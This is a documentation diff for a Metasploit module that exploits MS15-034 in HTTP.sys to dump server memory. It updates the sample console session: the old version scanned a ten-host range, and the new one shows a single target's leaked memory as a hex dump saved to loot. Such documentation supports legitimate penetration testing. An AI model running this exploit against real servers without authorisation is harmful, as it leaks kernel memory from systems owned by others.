@@ -12,8 +12,8 @@ This module dumps memory contents using a crafted Range header and affects only
12
12
## Sample Output
13
13
```
14
14
msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
15
- msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.10.141.11-20
16
- RHOSTS => 10.10.141.11-20
15
+ msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125
16
+ RHOSTS => 10.1.1.125
17
17
msf auxiliary(ms15_034_http_sys_memory_dump) > set RPORT 80
18
18
RPORT => 80
19
19
msf auxiliary(ms15_034_http_sys_memory_dump) > show options
@@ -23,7 +23,7 @@ Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):
23
23
Name Current Setting Required Description
24
24
---- --------------- -------- -----------
25
25
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
26
- RHOSTS 10.10.141.11-20 yes The target address range or CIDR identifier
26
+ RHOSTS 10.1.1.125 yes The target address range or CIDR identifier
27
27
RPORT 80 yes The target port
28
28
SSL false no Negotiate SSL/TLS for outgoing connections
29
29
SUPPRESS_REQUEST true yes Suppress output of the requested resource
@@ -32,86 +32,42 @@ Module options (auxiliary/scanner/http/ms15_034_http_sys_memory_dump):
32
32
33
33
msf auxiliary(ms15_034_http_sys_memory_dump) > exploit
34
34
35
- [+] Target may be vulnerable...
35
+ [+] Target is vulnerable!
36
+ [+] Content length is 10240 bytes
36
37
[+] Stand by...
37
-
38
- [+] Memory contents:
39
-
40
-
41
- [*] Memory dump saved to /root/.msf4/loot/20170320143459_default_10.10.141.11_iis.ms15034_241505.bin
42
- [*] Scanned 1 of 10 hosts (10% complete)
43
- [+] Target may be vulnerable...
44
- [+] Stand by...
45
-
46
- [+] Memory contents:
47
-
48
-
49
- [*] Memory dump saved to /root/.msf4/loot/20170320143459_default_10.10.141.12_iis.ms15034_783265.bin
50
- [*] Scanned 2 of 10 hosts (20% complete)
51
- [+] Target may be vulnerable...
52
- [+] Stand by...
53
-
54
- [+] Memory contents:
55
-
56
-
57
- [*] Memory dump saved to /root/.msf4/loot/20170320143459_default_10.10.141.13_iis.ms15034_433508.bin
58
- [*] Scanned 3 of 10 hosts (30% complete)
59
- [+] Target may be vulnerable...
60
- [+] Stand by...
61
-
62
- [+] Memory contents:
63
-
64
-
65
- [*] Memory dump saved to /root/.msf4/loot/20170320143500_default_10.10.141.14_iis.ms15034_663607.bin
66
- [*] Scanned 4 of 10 hosts (40% complete)
67
- [+] Target may be vulnerable...
68
- [+] Stand by...
69
-
70
- [+] Memory contents:
71
-
72
-
73
- [*] Memory dump saved to /root/.msf4/loot/20170320143500_default_10.10.141.15_iis.ms15034_695505.bin
74
- [*] Scanned 5 of 10 hosts (50% complete)
75
- [+] Target may be vulnerable...
76
- [+] Stand by...
77
-
78
- [+] Memory contents:
79
-
80
-
81
- [*] Memory dump saved to /root/.msf4/loot/20170320143501_default_10.10.141.16_iis.ms15034_254486.bin
82
- [*] Scanned 6 of 10 hosts (60% complete)
83
- [+] Target may be vulnerable...
84
- [+] Stand by...
85
-
86
- [+] Memory contents:
87
-
88
-
89
- [*] Memory dump saved to /root/.msf4/loot/20170320143502_default_10.10.141.17_iis.ms15034_393454.bin
90
- [*] Scanned 7 of 10 hosts (70% complete)
91
- [+] Target may be vulnerable...
92
- [+] Stand by...
93
-
94
38
[+] Memory contents:
95
-
96
-
97
- [*] Memory dump saved to /root/.msf4/loot/20170320143502_default_10.10.141.18_iis.ms15034_330159.bin
98
- [*] Scanned 8 of 10 hosts (80% complete)
99
- [+] Target may be vulnerable...
100
- [+] Stand by...
101
-
102
- [+] Memory contents:
103
-
104
-
105
- [*] Memory dump saved to /root/.msf4/loot/20170320143503_default_10.10.141.19_iis.ms15034_165710.bin
106
- [*] Scanned 9 of 10 hosts (90% complete)
107
- [+] Target may be vulnerable...
108
- [+] Stand by...
109
-
110
- [+] Memory contents:
111
-
112
-
113
- [*] Memory dump saved to /root/.msf4/loot/20170320143504_default_10.10.141.20_iis.ms15034_980170.bin
114
- [*] Scanned 10 of 10 hosts (100% complete)
39
+ [*] 4854 5450 2f31 2e31 2032 3030 204f 4b0d HTTP/1.1 200 OK.
40
+ [*] 0a43 6f6e 7465 6e74 2d54 7970 653a 2074 .Content-Type: t
41
+ [*] 6578 742f 6874 6d6c 0d0a 4c61 7374 2d4d ext/html..Last-M
42
+ [*] 6f64 6966 6965 643a 204d 6f6e 2c20 3232 odified: Mon, 20
43
+ [*] 204a 756e 2032 3031 3520 3134 3a32 313a Mar 2017 21:27:
44
+ [*] 3535 2047 4d54 0d0a 4163 6365 7074 2d52 55 GMT..Accept-R
45
+ [*] 616e 6765 733a 2062 7974 6573 0d0a 4554 anges: bytes..ET
46
+ [*] 6167 3a20 2261 3563 6663 3863 6166 3661 ag: "a5cfc8caf6a
47
+ [*] 6364 3031 3a30 220d 0a53 6572 7665 723a cd01:0"..Server:
48
+ [*] 204d 6963 726f 736f 6674 2d49 4953 2f38 Microsoft-IIS/8
49
+ [*] 2e35 0d0a 582d 506f 7765 7265 642d 4279 .5..X-Powered-By
50
+ [*] 3a20 4153 502e 4e45 540d 0a00 0000 0000 : ASP.NET.......
51
+ [*] 0000 0202 4672 6167 0000 0000 0000 0000 ....Frag........
52
+ [*] c028 0000 0000 0000 0000 0000 0000 0000 .(..............
53
+ [*] 0200 0a00 4672 6565 0000 0000 0000 0000 ....Free........
54
+ [*] d01e f6c5 02f8 ffff 40a2 6502 00e0 ffff [email protected] .....
55
+ [*] 0a00 0d02 4d64 6c20 0000 0000 0000 0000 ....Mdl ........
56
+ [*] 1000 6702 00e0 ffff 3800 0c00 0000 0000 ..g.....8.......
57
+ [*] 0000 0000 0000 0000 ba9a e501 00e0 ffff ................
58
+ [*] 0090 e501 00e0 ffff 5c00 0000 ba0a 0000 ........\.......
59
+ [*] 59a8 1300 0000 0000 0000 0000 0000 0000 Y...............
60
+ [*] 0000 0000 0000 0000 0000 0000 0000 e0dc ................
61
+ [*] 0d00 0d02 4d64 6c20 0000 0000 0000 0000 ....Mdl ........
62
+ [*] 9079 2602 00e0 ffff 3800 1c00 0000 0000 .y&.....8.......
63
+ ...
64
+ ...
65
+ ...
66
+ [*] 6079 0702 00e0 ffff 0000 0000 0000 0000 `y..............
67
+ [*] 0e00 1902 5669 4d6d 0000 0000 0000 0000 ....ViMm........
68
+ [*] Suppressed 346 uninteresting lines
69
+ [*] Memory dump saved to /home/rw/.msf4/loot/20150622073911_default_10.1.1.125_iis.ms15034_145400.bin
70
+ [*] Scanned 1 of 1 hosts (100% complete)
115
71
[*] Auxiliary module execution completed
116
72
msf auxiliary(ms15_034_http_sys_memory_dump) >
117
73
```
0 commit comments